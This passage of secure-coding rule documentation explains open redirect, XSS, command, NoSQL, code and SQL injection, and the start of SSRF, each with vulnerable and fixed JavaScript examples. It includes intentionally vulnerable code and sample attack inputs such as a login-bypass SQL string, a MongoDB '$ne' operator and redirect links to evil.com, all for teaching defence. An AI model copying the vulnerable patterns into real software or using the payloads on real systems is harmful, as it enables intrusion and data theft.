Attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

If an attacker tricks a user into opening a link of their choice, the user is redirected to a domain controlled by the attacker.

From then on, the attacker can perform various malicious actions, some more impactful than others.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Domain Mirroring

A malicious link redirects to an attacker-controlled website that mirrors the interface of a web application the user trusts. Due to the similar appearance and the seemingly trustworthy hyperlink, the user struggles to identify that they are browsing a malicious domain.

Depending on the attacker’s purpose, the malicious website can leak credentials, bypass Multi-Factor Authentication (MFA), and reach any authenticated data or action.

Malware Distribution

A malicious link redirects to an attacker-controlled website that serves malware. On the same basis as the domain mirroring exploitation, the attacker develops a spearphishing or phishing campaign with a carefully crafted pretext that results in the download and potential execution of a hosted malicious file.
The worst-case scenario could result in complete system compromise.

How to fix it in Express.js

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

server.get('/redirect', (request, response) => {

   response.redirect(request.query.url); // Noncompliant
});

Compliant solution

server.get('/redirect', (request, response) => {

   if (request.query.url.startsWith("https://www.example.com/")) {
      response.redirect(request.query.url);
   }
});

How does this work?

Built-in framework methods should be preferred because, more often than not, they provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections and thus might not fit every use case.

In case the application strictly requires external redirections based on user-controllable data, this could be done using the following alternatives:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allow-list approach in case the destination URLs are multiple but limited.
  3. Adding a customized page to which users are redirected, warning about the imminent action and requiring manual authorization to proceed.
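
The second alternative, the allow-list approach, can be sketched as follows (the host names and helper name are placeholders):

```python
from urllib.parse import urlparse

# Illustrative allow-list of permitted external redirect targets.
ALLOWED_REDIRECT_HOSTS = {"www.example.com", "docs.example.com"}

def is_safe_redirect(url: str) -> bool:
    # Compare the parsed scheme and hostname against the allow-list
    # instead of using a prefix check on the raw URL string.
    parts = urlparse(url)
    return parts.scheme == "https" and parts.hostname in ALLOWED_REDIRECT_HOSTS
```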

Pitfalls

The trap of 'StartsWith' and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator / as the last character.

If the validation string does not contain a terminating path separator, the Open Redirect vulnerability remains; only the exploitation technique changes.

Thus, a validation like startsWith("https://example.com") or an equivalent with the regex ^https://example\.com.* can be exploited with the following URL https://example.com.malicious.io. The practice of taking over domains that maliciously look like existing domains is widespread and is called Cybersquatting.

Resources

Standards

tssecurity:S5696

Why is this an issue?

DOM-based cross-site scripting (XSS) occurs in a web application when its client-side logic reads user-controllable data, such as the URL, and then uses this data in dangerous functions defined by the browser, such as eval(), without sanitizing it first.

When well-intentioned users open a link to a page vulnerable to DOM-based XSS, they are exposed to several attacks targeting their browsers.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but also arbitrary code that can be interpreted by the user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting this vulnerability.

Website defacement

An attacker can use the vulnerability to change the target web application’s content as they see fit. Therefore, they might replace the website’s original content with inappropriate content, leading to brand and reputation damage for the web application owner. It could additionally be used in phishing campaigns, leading to the potential loss of user credentials.

User impersonation

When a user is logged into a web application and opens a malicious link, the attacker can steal that user’s web session and carry out unauthorized actions on their account. If the credentials of a privileged user (such as an administrator) are stolen, the attacker might be able to compromise all of the web application’s data.

Theft of sensitive data

Cross-site scripting allows an attacker to extract the application data of any user that opens their malicious link. Depending on the application, this can include sensitive data such as financial or health information. Furthermore, by injecting malicious code into the web application, it might be possible to record keyboard activity (keylogger) or even request access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers can use cross-site scripting vulnerabilities as a first step to exploit more dangerous vulnerabilities.

For example, suppose that the admin control panel of a web application contains an SQL injection vulnerability. In this case, an attacker could find an XSS vulnerability and send a malicious link to an administrator. Once the administrator opens the link, the SQL injection is exploited, giving the attacker access to all user data stored in the web application.

How to fix it in DOM API

Code examples

The following code is vulnerable to DOM-based cross-site scripting because it uses unsanitized URL parameters to alter the DOM of its webpage.

Because the user input is not sanitized here and the used DOM property is vulnerable to XSS, it is possible to inject arbitrary code in the user’s browser through this example.

Noncompliant code example

The Element.innerHTML property is used to replace the contents of the root element with user-supplied contents. The innerHTML property does not sanitize its input, thus allowing for code injection.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerHTML = input; // Noncompliant

Compliant solution

The HTMLElement.innerText property does not create DOM elements out of its input, instead treating its input as plain text. This makes it a safe alternative to Element.innerHTML, depending on the use case.

const rootEl = document.getElementById('root');
const queryParams = new URLSearchParams(document.location.search);
const input = queryParams.get("input");

rootEl.innerText = input;

How does this work?

In general, one should limit the use of dangerous properties and methods, such as Element.innerHTML or Document.write(), as there exist many ways for an attacker to exploit their usage. Instead, prefer the usage of safe alternatives such as HTMLElement.innerText or Node.textContent. Furthermore, frameworks such as React or Vue.js will automatically escape variables used in views, making it much harder to accidentally write vulnerable code.

If these options are not possible, sanitization of the attacker-controllable input should be preferred.

Sanitization of user-supplied data

By systematically encoding data that is written to the DOM, it is possible to prevent XSS attacks. In this case, the goal is to leave the data intact from the end user’s point of view but make it uninterpretable by web browsers.

However, selecting an encoding that is guaranteed to be safe can be a complex task. XSS exploitation techniques vary depending on the HTML context where malicious input is injected. As a result, a combination of HTML encoding, URL encoding and JavaScript escaping may be required, depending on the context. OWASP’s DOM-based XSS Prevention Cheat Sheet goes into more detail about the required sanitization.

Though browsers do not yet provide any direct API to do this sanitization, the DOMPurify library offers extensive functionality to prevent XSS and has been tested by a large user base.
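As a minimal illustration of the encoding idea, not a substitute for a vetted library such as DOMPurify, the characters that open or close HTML contexts can be replaced with their entity equivalents before the data is written to the page:

```javascript
// Minimal HTML entity encoding: the five characters that can open or close
// markup or attribute contexts are replaced with entities, so browsers
// render them literally instead of interpreting them.
function htmlEncode(input) {
  return String(input)
    .replace(/&/g, "&amp;")   // must run first, or entities get double-encoded
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(htmlEncode('<img src=x onerror=alert(1)>'));
```

Note that this only covers the HTML body context; attribute, URL, and JavaScript contexts need their own encodings, as the OWASP cheat sheet referenced above details.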

Pitfalls

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

For example, filtering out user inputs based on a denylist will never fully prevent XSS vulnerabilities from being exploited. This practice is sometimes used by web application firewalls. Time and time again, malicious users are able to find the exploitation payload that will defeat the filters of these firewalls.

Another common approach is to parse HTML and strip sensitive HTML tags. Again, this denylist approach is vulnerable by design: maintaining a list of sensitive HTML tags is very difficult in the long run.

Modification after sanitization

Caution should be taken if the user-supplied data is further modified after this data was sanitized. Doing so might void the effects of sanitization and introduce new XSS vulnerabilities. In general, modification of this data should occur beforehand instead.

Going the extra mile

Content Security Policy

With a defense-in-depth security approach, a Content Security Policy (CSP) can be added through the Content-Security-Policy HTTP header, or using a <meta> element. The CSP aims to mitigate XSS attacks by instructing client browsers not to load data that does not meet the application’s security requirements.

Server administrators can define an allowlist of domains that contain valid scripts, which will prevent malicious scripts (not stored on one of these domains) from being executed. If script execution is not needed on a certain webpage, it can also be blocked altogether.
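As a sketch (the CDN host is a placeholder), such a policy could be assembled and sent as a response header:

```javascript
// A restrictive example policy: scripts may only load from the site's own
// origin and one explicitly trusted CDN; plugin content is blocked entirely.
const csp = [
  "default-src 'self'",
  "script-src 'self' https://cdn.example.com",
  "object-src 'none'",
].join("; ");

// With Express, this would typically be set per response or via middleware:
// res.setHeader("Content-Security-Policy", csp);
console.log(csp);
```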

Resources

Documentation

Articles & blog posts

Standards

tssecurity:S2076

Why is this an issue?

OS command injections occur when applications build command lines from untrusted data before executing them with a system shell.
In that case, an attacker can tamper with the command line construction and force the execution of unexpected commands. This can lead to the compromise of the underlying operating system.

What is the potential impact?

An attacker exploiting an OS command injection vulnerability will be able to execute arbitrary commands on the underlying operating system.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of OS injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to command injection because it uses untrusted input to set up a new process. Therefore, an attacker can execute an arbitrary program that is installed on the system.

Noncompliant code example

const { execSync } = require('child_process')

const cmd = req.query.cmd
execSync(cmd) // Noncompliant

Compliant solution

const { spawnSync } = require('child_process')

const cmdId = parseInt(req.query.cmdId)
let host = req.query.host
host = typeof host === "string" ? host : "example.org"

const allowedCommands = [
    {exe:"/bin/ping", args:["-c","1","--"]},
    {exe:"/bin/host", args:["--"]}
]
const cmd = allowedCommands[cmdId]
spawnSync(cmd.exe, cmd.args.concat(host))

How does this work?

Allowing users to execute operating system commands generally creates more problems than it solves.

Anything that can be done via operating system commands can usually be done via a language’s native SDK.
Therefore, our first suggestion is to avoid using OS commands in the first place.
However, if the application requires running OS commands with user-controlled data, here are some security suggestions.

Pre-Approved commands

If the application aims to execute only a small number of OS commands (for example, ls, pwd, and grep), the cleanest way to avoid this problem is to validate the input before using it in an OS command.

Create a list of authorized and secure commands that you want the application to be able to execute. Use absolute paths to avoid any ambiguity.
If a user input does not match an entry in this list, it should be rejected because it is considered unsafe.

Depending on the number of commands you want the application to support, the list can be either a regex string or any array type. If you use regexes, choose simple regexes to avoid ReDoS attacks. For example, you can accept only a specific set of executables by using ^/bin/(ls|pwd|grep)$.
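A sketch of such a regex-based allowlist, using the pattern mentioned above:

```javascript
// Anchored, simple pattern: only these three absolute paths are accepted.
const allowedExe = /^\/bin\/(ls|pwd|grep)$/;

console.log(allowedExe.test("/bin/ls"));      // accepted
console.log(allowedExe.test("/bin/ls -la"));  // rejected: extra characters
console.log(allowedExe.test("/tmp/evil"));    // rejected: not in the list
```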

Important note: the application must perform this validation on the server side, not in client-side front-ends.

In the example compliant code, a static list of trusted commands is used. Users are only allowed to submit an index in this array in place of a full command name.

Neutralize special characters

If the application must execute complex commands that cannot be restricted to a pre-approved list, the cleanest approach is to use special sanitization components, such as child_process.spawn.

The library helps neutralize common dangerous characters, such as:

  • &
  • |
  • ;
  • $
  • >
  • <
  • `
  • \
  • !

If user input is to be included in the arguments of a command, the application must ensure that dangerous options or argument delimiters are neutralized.
Argument delimiters include ', -, and spaces.

For example, the find command from UNIX supports the dangerous argument -exec.
In this case, option processing can be terminated with a string containing -- or with special options. For example, git supports --end-of-options since version 2.24.

In the example compliant code, the spawn function from child_process is used in place of its less secure exec counterpart. It accepts command arguments as an array and passes them directly to the target program, without building a shell command line from them.

Disable shell integration

In most cases, command execution libraries offer two ways to execute an external program: with or without shell integration.

When shell integration is allowed, an attacker with control over the command arguments can simply execute additional external programs using system shell features. For example, on Unix, command pipelining (|) or string interpolation ($(), <(), etc.) can be used to break out of a command call.

Therefore, it is generally preferable to disable shell integration.

The spawn function that is used in the example compliant code disables shell integration by default.

Pitfalls

Loose typing

Because JavaScript is a loosely typed language, extra care should be taken when accepting user-controlled parameters. Indeed, some methods that can be used to sanitize untrusted parameters accept both single objects and arrays of objects.

For example, the Array.prototype.concat function accepts either single values or arrays, and flattens array arguments into the resulting array. When an untrusted parameter is an array, while a single string was expected, using concat to build a command argument list can result in an arbitrary argument injection.

It is therefore of prime importance to check the type of untrusted parameters before processing them.

In the above compliant code example, the ambiguous concat function is used. However, a type check has been introduced to prevent this issue.
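The trap and its fix can be sketched as follows (the query values are illustrative):

```javascript
// A query string like "?host=--version&host=example.org" can deserialize to
// an array under extended query parsing, instead of the expected string.
const untrusted = ["--version", "example.org"];

const baseArgs = ["-c", "1", "--"];

// concat flattens the array: every attacker element becomes its own argument.
console.log(baseArgs.concat(untrusted)); // [ '-c', '1', '--', '--version', 'example.org' ]

// A type check collapses unexpected shapes to a safe default first:
const host = typeof untrusted === "string" ? untrusted : "example.org";
console.log(baseArgs.concat(host));      // [ '-c', '1', '--', 'example.org' ]
```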

Resources

Documentation

Standards

tssecurity:S6105

Why is this an issue?

Open redirection occurs when an application uses user-controllable data to build URLs used during redirects.

An attacker with malicious intent could manipulate a user to browse into a specially crafted URL, such as https://trusted.example.com/redirect?url=evil.com, to redirect the victim to their evil domain.

Open redirection is most often used to trick users into browsing to a malicious domain that they believe is safe. As such, attackers commonly use open redirect exploits in mass phishing campaigns.

What is the potential impact?

An attacker can use this vulnerability to redirect a user from a trusted domain to a malicious domain controlled by the attacker. At that point, the attacker can perform various attacks, such as phishing.

Below are some scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Phishing

Suppose the attacker creates a malicious website that mirrors the interface of the trusted website. In that case, they can use the open redirect vulnerability to lead the user to this malicious site.

Due to the similarity in the application appearance and the supposedly trustable hyperlink, the user fails to identify that they are browsing on a malicious domain. From here, an attacker can capture the user’s credentials, bypass Multi-Factor Authentication (MFA), and take over the user’s account on the trusted website.

Malware distribution

By leveraging the domain mirroring technique explained above, the attacker could also create a website that hosts malware. A user who is unaware of the redirection from a trusted website to this malicious website might then download and execute the attacker’s malware. In the worst case, this can lead to a complete system compromise for the user.

JavaScript injection (XSS)

In certain circumstances, an attacker can use DOM-based open redirection to execute JavaScript code. This can lead to further exploitation in the trusted domain and has consequences such as the compromise of the user’s account.

How to fix it in DOM API

Code examples

The following noncompliant code example is vulnerable to open redirection as it constructs a URL with user-controllable data. This URL is then used to redirect the user without being first validated. An attacker can leverage this to manipulate users into performing unwanted redirects.

Noncompliant code example

The following example is vulnerable to open redirection through the following URL: https://example.com/redirect?url=https://evil.com

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");
document.location = redirectUrl; // Noncompliant

Compliant solution

const queryParams = new URLSearchParams(document.location.search);
const redirectUrl = queryParams.get("url");

if (redirectUrl.startsWith("https://www.example.com/")) {
    document.location = redirectUrl;
}

How does this work?

Most client-side frameworks, such as Vue.js or React.js, provide built-in redirection methods. Those should be preferred as they often provide additional security mechanisms. However, these built-in methods are usually engineered for internal page redirections. Thus, they might not solve the reader’s use case.

In case the application strictly requires external redirections based on user-controllable data, the following should be done instead:

  1. Validating the authority part of the URL against a statically defined value (see Pitfalls).
  2. Using an allowlist approach in case the destination URLs are multiple but limited.
  3. Adding a dynamic confirmation dialog, warning about the imminent action and requiring manual authorization to proceed to the actual redirection.

Pitfalls

The trap of String.startsWith and equivalents

When validating untrusted URLs by checking if they start with a trusted scheme and authority pair scheme://authority, ensure that the validation string contains a path separator character (i.e., a /) as the last character.

When this character is not present, attackers may be able to register a specific domain name that both passes validation and is controlled by them.

For example, when validating the https://example.com domain, suppose an attacker owns the https://example.evil domain. If the prefix-based validation is implemented incorrectly, they could create a https://example.com.example.evil subdomain to abuse the broken validation.

The practice of taking over domains that maliciously look like existing domains is widespread and is called cybersquatting.

Resources

Standards

tssecurity:S5147

Why is this an issue?

NoSQL injections occur when an application retrieves untrusted data and inserts it into a database query without sanitizing it first.

What is the potential impact?

In the context of a web application that is vulnerable to NoSQL injection:
After discovering the injection point, attackers insert data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data leakage

In the context of simple query logic breakouts, a malicious database query enables privilege escalation or direct data leakage from one or more databases.
This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP) as missing data can disrupt the regular operations of an organization.

Chaining NoSQL injections with other vulnerabilities

Attackers who exploit NoSQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This oversight can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in MongoDB

Code examples

The following code is vulnerable to a NoSQL injection because the database query is built using untrusted JavaScript objects that are extracted from user inputs.

Here the application assumes the user-submitted parameters are always strings, while they might contain more complex structures. An array or dictionary input might tamper with the expected query behavior.

Noncompliant code example

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user, city: req.query.city };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query) // Noncompliant
        .toArray((err, docs) => { });
    });
}

Compliant solution

const { MongoClient } = require('mongodb');

function (req, res) {
    let query = { user: req.query.user.toString(), city: req.query.city.toString() };

    MongoClient.connect(url, (err, db) => {
        db.collection("users")
        .find(query)
        .toArray((err, docs) => { });
    });
}

How does this work?

Use only plain string values

With MongoDB, NoSQL injection can arise when attackers are able to inject objects into the query instead of plain string values. For example, using the object { $ne: "" } in a field of a find query will return every entry where the field is not empty.

Some JavaScript application servers enable "extended" syntax that serializes URL query parameters into JavaScript objects or arrays. This allows attackers to control all the fields of an object. In Express.js, this "extended" syntax is enabled by default.

Before using any untrusted value in a MongoDB query, make sure it is a plain string and not a JavaScript object or an array.
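A sketch of the check (the object literal stands in for what extended query parsing would produce):

```javascript
// "?user[$ne]=" can deserialize into an object under extended query parsing:
const fromUrl = { $ne: "" };       // attacker-controlled shape, not a string
console.log(typeof fromUrl);       // "object"

// Rejecting or coercing non-strings strips the operator semantics before the
// value reaches the query, as the compliant example does with toString():
const value = typeof fromUrl === "string" ? fromUrl : String(fromUrl);
console.log(value);                // "[object Object]": plain, harmless text
```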

In some cases, this will not be enough to protect against all attacks, and strict validation needs to be applied (see the "Pitfalls" section).

Pitfalls

Code execution

When untrusted data is used within query operators such as $where, $accumulator, or $function it usually results in JavaScript code execution vulnerabilities.

Therefore, untrusted values should not be used inside these query operators unless they are properly validated.

For more information about MongoDB code execution vulnerabilities, see rule S5334.

Resources

Articles & blog posts

Standards

tssecurity:S5334

Why is this an issue?

Code injections occur when applications allow the dynamic execution of code instructions from untrusted data.
An attacker can influence the behavior of the targeted application and modify it to get access to sensitive data.

What is the potential impact?

An attacker exploiting a dynamic code injection vulnerability will be able to execute arbitrary code in the context of the vulnerable application.

The impact depends on the access control measures taken on the target system OS. In the worst-case scenario, the process that executes the code runs with root privileges, and therefore any OS commands or programs may be affected.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Denial of service and data leaks

In this scenario, the attack aims to disrupt the organization’s activities and profit from data leaks.

An attacker could, for example:

  • download the internal server’s data, most likely to sell it
  • modify data, send malware
  • stop services or exhaust resources (with fork bombs for example)

This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Root privilege escalation and pivot

In this scenario, the attacker can do everything described in the previous section. The difference is that the attacker also manages to elevate their privileges to an administrative level and attacks other servers.

Here, the impact depends on how much the target company focuses on its Defense In Depth. For example, the entire infrastructure can be compromised by a combination of code injections and misconfiguration of:

  • Docker or Kubernetes clusters
  • cloud services
  • network firewalls and routing
  • OS access control

How to fix it in Node.js

Code examples

The following code is vulnerable to arbitrary code execution because it dynamically runs JavaScript code built from untrusted data.

Noncompliant code example

function (req, res) {
    let operation = req.query.operation
    eval(`product_${operation}()`) // Noncompliant
    res.send("OK")
}

Compliant solution

const allowed = ["add", "remove", "update"]

let operationId = req.query.operationId
const operation = allowed[operationId]
eval(`product_${operation}()`)
res.send("OK")

How does this work?

Allowing users to execute code dynamically generally creates more problems than it solves.

Anything that can be done via dynamic code execution can usually be done via a language’s native SDK and static code.
Therefore, our suggestion is to avoid executing code dynamically.
If the application requires the execution of dynamic code, additional security measures must be taken.

Dynamic parameters

When the untrusted values are only expected to be values used in standard processing, it is generally possible to provide them as parameters of the dynamic code. In that case, care should be taken to ensure that only the name of the untrusted parameter is passed to the dynamic code, and that its value is not expanded into the code text itself. After that, the dynamic code can safely access the untrusted parameter's content and perform the processing.
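A sketch of the parameter-passing idea (the names and payload are illustrative): the dynamic code text stays static, and the untrusted value enters only as an argument:

```javascript
// Hypothetical untrusted value that would break out of a concatenated string:
const untrusted = '"); doEvil(("';

// Unsafe shape (do not use): eval('process("' + untrusted + '")')
// Safer shape: the source text is fixed; the value is bound as a parameter.
const dynamicFn = new Function("input", "return input.toUpperCase();");
console.log(dynamicFn(untrusted)); // the payload is processed as plain data
```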

Allow list

When the untrusted parameters are expected to contain operators, function names or other reflection-related values, best practices would encourage using an allow list. This one would contain a list of accepted safe values that can be used as part of the dynamic code.

When receiving an untrusted parameter, the application would verify its value is contained in the configured allow list. If it is present, the parameter is accepted. Otherwise, it is rejected and an error is raised.

Another similar approach is using a binding between identifiers and accepted values. That way, users are only allowed to provide identifiers, where only valid ones can be converted to a safe value.

The example compliant code uses such a binding approach.

Resources

Articles & blog posts

Standards

tssecurity:S3649

Why is this an issue?

Database injections (such as SQL injections) occur in an application when the application retrieves data from a user or a third-party service and inserts it into a database query without sanitizing it first.

If an application contains a database query that is vulnerable to injections, it is exposed to attacks that target any database where that query is used.

A user with malicious intent carefully crafts input designed to change the logic of the existing query to a malicious one.

After creating the malicious request, the attacker can attack the databases affected by this vulnerability without relying on any prerequisites.

What is the potential impact?

In the context of a web application that is vulnerable to SQL injection:
After discovering the injection, attackers inject data into the vulnerable field to execute malicious commands in the affected databases.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Identity spoofing and data manipulation

A malicious database query enables privilege escalation or direct data leakage from one or more databases. This threat is the most widespread impact.

Data deletion and denial of service

The malicious query makes it possible for the attacker to delete data in the affected databases.
This threat is particularly insidious if the attacked organization does not maintain a disaster recovery plan (DRP).

Chaining DB injections with other vulnerabilities

Attackers who exploit SQL injections rely on other vulnerabilities to maximize their profits.
Most of the time, organizations overlook some defense in depth measures because they assume attackers cannot reach certain points in the infrastructure. This oversight can lead to multiple attacks with great impact:

  • When secrets are stored unencrypted in databases: Secrets can be exfiltrated and lead to compromise of other components.
  • If server-side OS and/or database permissions are misconfigured, injection can lead to remote code execution (RCE).

How to fix it in Sequelize

Code examples

The following code is an example of an overly simple authentication function. It is vulnerable to SQL injection because user-controlled data is inserted directly into a query string: The application assumes that incoming data always has a specific range of characters, and ignores that some characters may change the query logic to a malicious one.

In this particular case, the query can be exploited with the following string:

foo' OR 1=1 --

By adapting and inserting this template string into one of the fields (user or pass), an attacker would be able to log in as any user within the scoped user table.

Noncompliant code example

async function index(req, res) {
    const { db, User } = req.app.get('sequelize');

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = '${req.query.user}' AND pass = '${req.query.pass}'`,
        {
            model: User,
        }
    ); // Noncompliant

    res.send(JSON.stringify(loggedInUser));
    res.end();
}

Compliant solution

async function index(req, res) {
    const { db, User, QueryTypes } = req.app.get('sequelize');

    let user = req.query.user;
    let pass = req.query.pass;

    let loggedInUser = await db.query(
        `SELECT * FROM users WHERE user = $user AND pass = $pass`,
        {
            bind: {
                user: user,
                pass: pass,
            },
            type: QueryTypes.SELECT,
            model: User,
        }
    );

    res.send(JSON.stringify(loggedInUser));
    res.end();
}

How does this work?

Use prepared statements

As a rule of thumb, the best approach to protect against injections is to systematically ensure that untrusted data cannot break out of an interpreted context.

For database queries, prepared statements are a natural mechanism to achieve this due to their internal workings.
Here is an example with the following query string (Java SE syntax):

SELECT * FROM users WHERE user = ? AND pass = ?

Note: Placeholders may take different forms, depending on the library used. For the above example, the question mark symbol '?' was used as a placeholder.

When a prepared statement is used by an application, the database server compiles the query logic even before the application passes the literals corresponding to the placeholders to the database.
Some libraries expose a prepareStatement function that explicitly does so, while others handle it transparently.

The compiled code that contains the query logic also includes the placeholders: they serve as parameters.

After compilation, the query logic is frozen and cannot be changed.
So when the application passes the literals that replace the placeholders, they are not considered application logic by the database.

Consequently, the database server prevents the dynamic literals of a prepared statement from affecting the underlying query, and thus sanitizes them.

On the other hand, the application does not automatically sanitize third-party data (for example, user-controlled data) inserted directly into a query. An attacker who controls this third-party data can cause the database to execute malicious code.

Resources

Articles & blog posts

Standards

tssecurity:S5131

This vulnerability makes it possible to temporarily execute JavaScript code in the context of the application, granting access to the session of the victim. This is possible because user-provided data, such as URL parameters, are copied into the HTML body of the HTTP response that is sent back to the user.

Why is this an issue?

Reflected cross-site scripting (XSS) occurs in a web application when the application retrieves data like parameters or headers from an incoming HTTP request and inserts it into its HTTP response without first sanitizing it. The most common cause is the insertion of GET parameters.

When well-intentioned users open a link to a page that is vulnerable to reflected XSS, they are exposed to attacks that target their own browser.

A user with malicious intent carefully crafts the link beforehand.

After creating this link, the attacker must use phishing techniques to ensure that their target users click on the link.

What is the potential impact?

A well-intentioned user opens a malicious link that injects data into the web application. This data can be text, but it can also be arbitrary code that can be interpreted by the target user’s browser, such as HTML, CSS, or JavaScript.

Below are some real-world scenarios that illustrate some impacts of an attacker exploiting the vulnerability.

Vandalism on the front-end website

The malicious link defaces the target web application from the perspective of the user who is the victim. This may result in a loss of integrity and theft of the well-intentioned user's data.

Identity spoofing

The forged link injects malicious code into the web application. The code enables identity spoofing thanks to cookie theft.

Record user activity

The forged link injects malicious code into the web application. To leak confidential information, attackers can inject code that records keyboard activity (keylogger) and even requests access to other devices, such as the camera or microphone.

Chaining XSS with other vulnerabilities

In many cases, bug hunters and attackers chain cross-site scripting vulnerabilities with other vulnerabilities to maximize their impact.
For example, an XSS can be used as the first step to exploit more dangerous vulnerabilities or features that require higher privileges, such as a code injection vulnerability in the admin control panel of a web application.

How to fix it in Express.js

Code examples

The following code is vulnerable to cross-site scripting because it returns an HTML response that contains unsanitized user input.

If you do not intend to send HTML code to clients, the vulnerability can be fixed by specifying the type of data returned in the response. For example, in Express.js you can use res.json() to safely return JSON messages.

Noncompliant code example

function (req, res) {
    const json = JSON.stringify({ "data": req.query.input });
    res.send(json);
};

Compliant solution

function (req, res) {
    res.json({ "data": req.query.input });
};

It is also possible to set the Content-Type header manually, for example with res.set() or res.type(), before sending the response.

Noncompliant code example

function (req, res) {
    res.send(req.query.input);
};

Compliant solution

function (req, res) {
    res.set('Content-Type', 'text/plain');
    res.send(req.query.input);
};

How does this work?

In case the response consists of HTML code, it is highly recommended to use a template engine like ejs to generate it. This template engine separates the view from the business logic and automatically encodes the output of variables, drastically reducing the risk of cross-site scripting vulnerabilities.
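The core of that automatic output encoding can be sketched in a few lines. This is an illustrative stand-in for what engines like ejs do with <%= %>, not their actual implementation:

```javascript
// Minimal HTML output encoding, as performed automatically by template
// engines. Each character that could open a tag or attribute context is
// replaced by its HTML entity, so injected markup is rendered as text.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")   // must be first, or entities get double-escaped
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

const input = '<script>alert(1)</script>';
console.log(escapeHtml(input)); // &lt;script&gt;alert(1)&lt;/script&gt;
```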

If you do not intend to send HTML code to clients, the vulnerability can be resolved by telling them what data they are receiving with the content-type HTTP header. This header tells the browser that the response does not contain HTML code and should not be parsed and interpreted as HTML. Thus, the HTTP response is not vulnerable to reflected Cross-Site Scripting.

For example, setting the content-type header to text/plain makes it possible to safely reflect user input, since browsers will not try to parse and execute the response.

Pitfalls

Content-types

Be aware that content-types other than text/html also allow executing JavaScript code in a browser and are therefore prone to cross-site scripting vulnerabilities.
The following content-types are known to be affected:

  • application/mathml+xml
  • application/rdf+xml
  • application/vnd.wap.xhtml+xml
  • application/xhtml+xml
  • application/xml
  • image/svg+xml
  • multipart/x-mixed-replace
  • text/html
  • text/rdf
  • text/xml
  • text/xsl

The limits of validation

Validation of user inputs is a good practice to protect against various injection attacks. But for XSS, validation on its own is not the recommended approach.

As an example, filtering out user inputs based on a deny-list will never fully prevent an XSS vulnerability from being exploited. This practice is sometimes used by web application firewalls, but it is only a matter of time before malicious users find an exploitation payload that defeats the filters.

Another example is applications that allow users or third-party services to send HTML content to be used by the application. A common approach is trying to parse HTML and strip sensitive HTML tags. Again, this deny-list approach is vulnerable by design: maintaining a list of sensitive HTML tags, in the long run, is very difficult.

A preferred option is to use Markdown in conjunction with a parser that removes embedded HTML and restricts the use of "javascript:" URIs.

Going the extra mile

Content Security Policy (CSP) Header

With a defense-in-depth security approach, the CSP response header can be added to instruct client browsers to block loading data that does not meet the application’s security requirements. If configured correctly, this can prevent any attempt to exploit XSS in the application.

Resources

Documentation

Articles & blog posts

Conference presentations

Standards

tssecurity:S5144

Why is this an issue?

Server-Side Request Forgery (SSRF) occurs when attackers can coerce a server to perform arbitrary requests on their behalf.

An SSRF vulnerability can either be basic or blind, depending on whether the server’s fetched data is directly returned in the web application’s response.
Even when the fetched data is not returned in the application's response (blind SSRF), exploitation remains possible, so blind SSRF must be treated in the same way as basic SSRF.

What is the potential impact?

SSRF usually results in unauthorized actions or data disclosure in the vulnerable application or on a different system it can reach. Depending on what is reachable, remote command execution is sometimes achievable, although it often requires chaining with further exploitations.

Information disclosure is SSRF’s core outcome. Depending on the extracted data, an attacker can perform a variety of different actions that can range from low to critical severity.

